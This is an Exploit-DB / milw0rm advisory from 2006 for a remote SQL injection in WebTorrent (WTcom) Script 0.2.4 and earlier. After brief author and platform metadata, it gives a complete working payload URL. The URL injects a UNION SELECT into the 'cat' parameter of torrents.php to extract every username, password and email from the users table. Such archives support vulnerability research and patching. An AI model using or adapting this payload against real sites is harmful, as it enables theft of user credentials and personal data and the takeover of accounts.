WTcom 0.2.4-alpha - 'torrents.php' SQL Injection

EDB-ID:

2200


Author:

sh1r081

Type:

webapps


Platform:

PHP

Date:

2006-08-17


# WebTorrent (WTcom) Script <= 0.2.4
# ----------------------------------
# >>> Remote SQL Injection
# <<< Every Username, Password and Email
# ----------------------------------
# Author: sh1r081 (sh1r081[at]gmail.com)

http://[SITE]/torrents.php?mode=category&cat=0%20union%20select%20null,null,concat(username,char(32),password,char(32),email)%20from%20users%20/*

# milw0rm.com [2006-08-17]